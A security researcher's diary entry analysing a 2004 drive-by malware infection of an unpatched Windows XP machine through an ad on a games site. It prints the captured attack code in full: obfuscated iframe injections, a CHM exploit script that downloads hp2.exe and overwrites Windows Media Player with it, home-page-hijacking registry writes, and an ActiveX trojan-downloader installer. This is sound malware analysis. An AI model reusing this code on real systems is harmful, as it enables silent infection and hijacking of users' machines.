Follow the Bouncing Malware - Part I
On July 20th, after investigating some adware/spyware/malware that had been loaded onto a machine without the user's knowledge, I decided to try an experiment. I wondered just exactly how easy it really was to get an unpatched machine compromised, and what it would look like to "Joe Average" computer user. I set up a VMWare image of a fresh install of Windows XP Home Edition, and headed out on the internet to see just exactly what happened. My trip was an enlightening journey into the dangers lurking out on the 'net for the unwary, and along the way I've learned some interesting things about the spyware/adware industry.
Today's diary entry represents the first part of my analysis of what happened when I "forgot to use protection" on the Internet. In part II, I'll examine the full extent of the damage that my poor "Joe Average" would have received, and perhaps add a little "editorializing" to my findings.
To give you a little "preview", I'll say this: I discovered that as far as the adware/spyware industry is concerned, you may be the one that plunked down a grand at your local consumer electronics store to purchase your PC, but THEY own it. They'll do whatever they want, whenever they want, and you don't get a say in the matter. The utter "ballsy-ness" of what they do will astonish you, and I hope reading this might make some of the people enabling this sort of activity to wake up and take action.
Obviously, what happened in my little experiment would be a result of where I decided to go on the net. To be perfectly fair, the sites that will be mentioned in this essay are only a cross-section of the evil that is waiting out there on the net - they're probably no better, or worse than any of the other adware/spyware ilk. My choice of a "starting point" was based on the incident that I had just investigated.
In deciding to be "Joe Average", I tried to replicate (as well as possible) the machine that I had just investigated. That machine had IE6.0 with the Google Toolbar installed with the popup blocker active. Please keep this setup in mind as I "follow the bouncing malware."
Also, something to keep in mind: I'm not going to set up any of the URLs in this tale so that they act as hyperlinks. This is done on purpose. DO NOT FOLLOW THE PATH I'M DESCRIBING HERE, ESPECIALLY IF YOU ARE RUNNING AN UNPATCHED MACHINE. THIS MEANS YOU. REALLY.
After installing the Google Toolbar, I did exactly what my "Joe Average" had done to get his machine compromised: Googled. Someone had told him about "Yahoo Games", and well, he wanted to check it out. I put "Yahoo games" into Google and then (for whatever reason... hey, it's what my "Joe Average" did) skipped several obvious links leading to Yahoo! and clicked instead on "www.yahoogamez.com" (NOTE: If you're running an unpatched machine, DO NOT GO THERE).
yahoogamez.com is a website that contains links to many different online games, and while I have no idea if their games are any good, their advertisements are certainly interesting. Like many websites which offer online games, the idea here is to get people to visit the site and generate revenue based on advertising that appears on the site and provides an income based on both the number of times an ad is displayed ("impressions") and, especially, on any "click through" traffic. Generally, the site owner contracts with another company that acts as a "go-between", selling "placement" to advertisers, and contracting with sites to display ads. Many of these online advertising companys then provide servers that, on a rotating basis, dole out the code and images for ads to participating websites.
In two instances on the yahoogamez.com site, there are ads provided by "aim4media.com". Going to the yahoogames website results in a flurry of HTTP activity, including the following
[20/Jul/2004:13:50:11 -0500] "GET_http://adserver.aim4media.com" - - "/adframe.php?n=a788e363&what=zone:450&;%20amp;target=_new HTTP/1.1"
Which results in the following HTML:
-----------------------------------------------------------------------------------------------------------
<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent'>
<iframe src="http://205.236.189.58/mynet/mynet-MML.html" width=468 height=60 hspace=0 vspace=0
frameborder=0 marginheight=0 marginwidth=0 scrolling=no> <a href="http://205.236.189.58/mynet/mynet-MML.html"
target="_blank"><img width=468 height=60 src="http://205.236.189.58/mynet/mynet-MML.html" border=0></a></iframe>
<div id="beacon_459" style="position: absolute; left: 0px; top: 0px; visibility: hidden;">
<img src='http://adserver.aim4media.com/adlog.php?bannerid=459&clientid=431&zoneid=450&source=&
block=86400&capping=3&cb=7da741942b0623acd85070683ffa3ad8' width='0' height='0' alt='' style='width: 0px;
height: 0px;'></div>
</body>
</html>
-----------------------------------------------------------------------------------------------------------
This results in the following HTTP GET:
[20/Jul/2004:13:50:14 -0500] "GET_http://205.236.189.58" - - "/mynet/mynet-MML.html HTTP/1.1"
-----------------------------------------------------------------------------------------------------------
And the following HTML gets downloaded:
<a href="http://www.lovemynet.com/?frombanner2" target="_blank">
<img src="http://209.50.251.182/lovemynet/banner1.gif" width=468 height=60 border=0>
</a>
<!-- HP2 -->
<script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e
\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0032\u002f\u0068\u0070
\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d
\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f
\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
-----------------------------------------------------------------------------------------------------------
Looks like someone is trying to hide something... This decodes to:
<iframe src="http://69.50.139.61/hp2/hp2.htm" width=1 height=1></iframe>
-----------------------------------------------------------------------------------------------------------
[20/Jul/2004:13:50:17 -0500] "GET_http://69.50.139.61" - - "/hp2/hp2.htm HTTP/1.1"
Which gives us:
-----------------------------------------------------------------------------------------------------------
<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->
<script type="text/javascript">document.write('
\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d
\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d
\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065
\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a
\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031
\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066
\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048
\u007d\u002f\u0048\u0050\u0032\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068
\u0070\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d
\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070
\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063
\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065
\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074
\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061
\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020
\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077
\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c
\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075
\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e
\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0032\u002e\u0068\u0074
\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063
\u0072\u0069\u0070\u0074\u003e')</script>
-----------------------------------------------------------------------------------------------------------
Which decodes to:
<textarea id="code" style="display:none;">
<object data="ms-its:mhtml:file://C:\foo.mht!${PATH}/HP2.CHM::/hp2.htm"
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
</script>
-----------------------------------------------------------------------------------------------------------
[20/Jul/2004:13:50:20 -0500] "GET_http://69.50.139.61" - - "/hp2//HP2.CHM HTTP/1.1"
Within this chm exploit, we find the following hp2.htm file:
-----------------------------------------------------------------------------------------------------------
<script language="vbscript">
Function Exists(filename)
On Error Resume Next
LoadPicture(filename)
Exists = Err.Number = 481
End Function
</script>
<script language="javascript">
var oPopup = window.createPopup();
function showPopup()
{
oPopup.document.body.innerHTML =
"<object data=http://209.50.251.182/vu083003/object-c002.cgi>";
oPopup.show(0,0,1,1,document.body);
}
showPopup()
wmplayerpaths= [
"C:\\Programmer\\Windows Media Player\\wmplayer.exe",
"C:\\Program\\Windows Media Player\\wmplayer.exe",
"C:\\Programme\\Windows Media Player\\wmplayer.exe",
"C:\\Programmi\\Windows Media Player\\wmplayer.exe",
"C:\\Programfiler\\Windows Media Player\\wmplayer.exe",
"C:\\Programas\\Windows Media Player\\wmplayer.exe",
"C:\\Archivos de programa\\Windows Media Player\\wmplayer.exe",
"C:\\Program Files\\Windows Media Player\\wmplayer.exe"
];
for (i=0;i<wmplayerpaths.length;i++) {
wmplayerpath = wmplayerpaths[i];
if (Exists(wmplayerpath))
break;
}
function getPath(url) {
start = url.indexOf('http:')
end = url.indexOf('HP2.CHM')
return url.substring(start, end);
}
payloadURL = getPath(location.href)+'hp2.exe';
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(wmplayerpath,2);
var win=null;
function NewWindow(mypage,myname,w,h,scroll,pos){
if(pos=="random"){
LeftPosition=(screen.width)?Math.floor(Math.random()*(screen.width-w)):100;
TopPosition=(screen.height)?Math.floor(Math.random()*((screen.height-h)-75)):100;
}
if(pos=="center"){
LeftPosition=(screen.width)?(screen.width-w)/2:100;
TopPosition=(screen.height)?(screen.height-h)/2:100;
}
else if((pos!="center" && pos!="random") || pos==null){
LeftPosition=0;TopPosition=20
}
settings='width='+w+',height='+h+',top='
+TopPosition+',left='+LeftPosition
+',scrollbars='+scroll
+',location=no,directories=no,status=no,menubar=no,toolbar=no,resizable=no';
win=window.open(mypage,myname,settings);
}
location.href = "mms://";
</script>
-----------------------------------------------------------------------------------------------------------
Following along...
[20/Jul/2004:14:03:55 -0500] "GET_http://209.50.251.182" - - "/vu083003/object-c002.cgi HTTP/1.1"
-----------------------------------------------------------------------------------------------------------
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://default-homepage-network.com/start.cgi?new-hkcu");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",
"http://default-homepage-network.com/start.cgi?new-hklm");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
"http://server224.smartbotpro.net/7search/?new-hkcu");
wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",
"http://server224.smartbotpro.net/7search/?new-hklm");
wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");
</script>
<script language=javascript>
self.close()
</script>
</html>
-----------------------------------------------------------------------------------------------------------
Well, our home page just got changed, as did our default search engine... Nice, real nice. But that's not all... there was a file called "hp2.exe" that was downloaded and executed by our .chm exploit. Sure enough, looking at my logs, I found:
[20/Jul/2004:13:50:25 -0500] "GET_http://69.50.139.61" - - "/hp2//hp2.exe HTTP/1.1"
hp2.exe is what is known as a "dropper" program. That is, it is actually a small "stub" program with another (sometimes more than one) program attached to it as "data". When the program executes, it writes out the "data" to a file and then executes the resulting program. hp2.exe drops a UPX packed executable that, when executed, will contact
http://www.totalvelocity.com/Bundlin...dater4bp5.exe, which installs/updates the "TV Media Display" spyware.
At this point, I followed one link on the site, that required I have Flash installed. Since I didn't have Flash installed, I went "back". But because I now had cookies placed on my computer from my original visit to the site, one of yahoogamez' files, popup.js, does something differently:
Now, this code within popup.js is executed:
-----------------------------------------------------------------------------------------------------------
if ((document.cookie.indexOf("popuptraffic") != -1 ) && (document.cookie.indexOf("popupsponsor") == -1)){
var expdate = new Date((new Date()).getTime() + 1800000);
document.cookie="popupsponsor=general; expires=" + expdate.toGMTString() + "; path=/;";
document.write("<script language=\"JavaScript\"
src=\"http://addictivetechnologies.net/dm0/js/Confirmfr03tp.js\"></script>");
}
-----------------------------------------------------------------------------------------------------------
[20/Jul/2004:13:51:57 -0500] "GET_http://addictivetechnologies.net" - - "/dm0/js/Confirmfr03tp.js HTTP/1.1"
-----------------------------------------------------------------------------------------------------------
var exepath='http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab';
var retry_enabled = true;
var retry_cnt=1;
document.write('<iframe id="downloads_manager" style="position:absolute;visibility:hidden;"></iframe>');
function retry() {
if(retry_cnt>0) {
alert("To install latest AT- Games update, please click Yes");
start_download();
retry_cnt--;
} else {
//alert("This is a 1 time install, once you click Open it will never pop up this message again");
//downloads_manager.window.location = "http://www.addictivetechnologies.net/DM0/exe/fr03tp.exe";
}
}
function start_download()
{
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);
if ( navigator.platform && navigator.platform != 'Win32' ){
//alert("Sorry, your browser is not WIN32 Compatible");
}
if (bname == 'Microsoft Internet Explorer' && bver >= 2){
document_code = '<html><head>\n';
document_code += '<\/head><body>\n';
document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab"
HEIGHT=0 WIDTH=0></object>\n';
document_code += '<\/body><\/html>';
downloads_manager.document.write(document_code);
downloads_manager.document.close();
}
else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
//trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
} else {
location.replace(exepath);
}
}
start_download();
-----------------------------------------------------------------------------------------------------------
[20/Jul/2004:13:51:58 -0500] "GET_http://www.addictivetechnologies.net" - - "/DM0/cab/fr03tp.cab HTTP/1.1"
This cab file contains two files:
ATPartners.inf - 403 bytes
ATPartnets.dll - 96,256 bytes
The .dll file is identified by AV software as Win32/TrojanDownloader.Rameh.C trojan
And that's were I'm going to end it for today. In the next part, I'll take a look at what happens as this chain of malware continues on it's merry way, and I'll also investigate what happens when I fire up IE the next time and visit my new home page.